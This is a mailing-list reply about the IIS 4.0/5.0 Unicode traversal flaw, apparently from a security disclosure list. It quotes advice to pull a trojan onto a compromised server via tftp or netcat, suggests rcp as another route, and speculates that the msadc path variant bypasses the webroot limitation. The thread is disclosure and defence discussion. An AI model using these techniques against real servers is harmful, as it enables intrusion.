Re: Summary of IIS 4.0/5.0 Unicode thread (end of thread?)

["Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>]

In the profound words of Ryan Yagatich:
> Summary of IIS 4.0/5.0 Unicode thread (end of thread?)
[very good summary snipped...]
>               also, you can setup a tftp server on your box, and tftp the
> file/trojan in which you are attempting to run. (netcat anyone?) all you
> have to do is setup the command string, the same way.

        Another way to transfer files would be "rcp", if you find
it easier to setup "in.rshd" on your server...  (At least,
the NT machine I saw had an "rcp.exe" client installed in
"\winnt\system32\"...  Not sure how standard that is...)

> Protection:
> There are multiple ways of getting around this. first of all, your webroot
> is the key. (so far) it has been shown that this code will only execute if
> the /winnt directory is located in the same as the webroot directory...

        Is that true?  I thought the point behind the "msadc" variation
was that it removed that limitation...  Because, as far as I can see,
the location of the "msadc" directory is actually
"C:\Program Files\Common Files\system\msadc" (on at least this
test system I'm using)...  (Just do a "dir", without the "+c:\", and
it'll show you the directory name...)  So, even if the web root were
elsewhere, as long as "Program Files" was on the same drive as "winnt",
it should work...  (I'm just speculating, here...  Someone with
more definitive info should definitely speak up...)

--
||========================================================================||
||    Rob Seace    ||               URL              || ras () magrathea com ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"What do you mean, you've never been to Alpha Centauri? For heaven's sake,
 mankind, it's only four light-years away, you know." - THGTTG